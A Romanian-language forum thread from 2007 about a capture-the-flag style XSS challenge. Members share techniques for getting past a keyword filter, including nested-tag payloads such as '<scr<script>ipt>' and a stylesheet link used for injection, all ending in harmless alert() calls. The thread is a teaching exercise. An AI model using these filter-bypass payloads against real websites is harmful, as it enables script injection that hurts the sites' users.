Hack Me

tw8 · November 18, 2007

Salut!

Va propun un wargame mai ciudat. Nu cred ca a mai fost unul la fel pe acest forum (si nici pe multe altele ).

http://www.europe.exofire.net/hackme/hackme.html

Scopul e sa reusiti sa injectati JAVASCRIPT (nu am filtrat caracterul > si astfel putti injecta aproape orice alt cod in afara de javascript).

Dificultatea este minima.

Bafta & astept Print-Screen-uri .

moubik · November 18, 2007

pot sa-ti dau codul pe privat daca vrei.

putem sa nu ne mai certam te rog ?

chiar vreau sa intru cu placere in continuare pe forumul acesta.

Nabukadnezar · November 19, 2007

moubik cum ai facut?

moubik · November 19, 2007

in loc sa faci blind xss attack, adica incerci chestii prestabilite in genul

"><script>alert(1)</script>

incerci chestii si incerci sa te adaptezi, sa folosesti sistemul de filtrare in avantajul tau.

de exemplu pe un site se filtra <script> si </script> si atunci cand am observat am incercat:

<scr<script>ipt >alert(1)</scr</script>ipt> - care evident este gresit. dar pentru ca ei filtreaza anumite cuvinte transforma acest string intr-unul valid

dude, tu ai facut super tutorial de hacking si de mentalitate.. sincer chiar l-am citit cu placere.

michee · November 19, 2007

cine, ce tutorial a facut?

amprenta · November 19, 2007

---- alt exemplu si multe altele...

ideea cam asta era ,cum a zis si moubik, sa obtii ceva valid dupa filtrare .

Nabukadnezar · November 19, 2007

am reusit mersi

buna metoda

moubik · November 19, 2007

a venit amprenta, a facut codul "public" si i-a facut pe toti leet acum

nu zic de tine Nabukadnezar

escalation666 · November 19, 2007

putem sa nu ne mai certam te rog ?
chiar vreau sa intru cu placere in continuare pe forumul acesta.

said moubik, screaming and crying like a little girl

tw8 · November 19, 2007

putem sa nu ne mai certam te rog ?
chiar vreau sa intru cu placere in continuare pe forumul acesta.

Si eu la fel . Considera-ne impacati (desi eu nu am considerat nicio clipa ce ne-am certat, ci doar ca am avut o diferenta in modul de a gandi).

@amprenta: trebuia sa ii lasi si pe ceilalti sa incerce .

moubik · November 19, 2007

November 20, 2007

metoda e in pm.

phreak · November 20, 2007

tw8 · November 23, 2007

Cred ca toti cei care ati vrut sa il faceti, ati avut destul timp la dispozitie . Acum, o sa sterg challenge-ul, pentru ca un XSS poate face multe .

Metode prin care puteati rezolva challenge-ul, era sa introduceti in input:

From SharinGod : <LINK REL=stylesheet HREF=http://ha.ckers.org/xss.css>
From phreak: <script<script> alert(2) </script</script>
From me: tw8<script<script>var i; i =/t/;i=i+/w8/;i=i.substring(1,2) + i.substring(4,6);alert(i);</script</script>

Restul au fost, probabil, variatiuni pe aceeasi tema.

Bafta !

shaikin · April 4, 2008

am facut niste cercetari si am descoperit ca programele de genu se numesc: how to keep an idiot busy! scuze nu am vrut sa jignesc pe cineva sau ceva... asta am descoperit....

Sign In

Hack Me

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Guest BanKai

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Join the conversation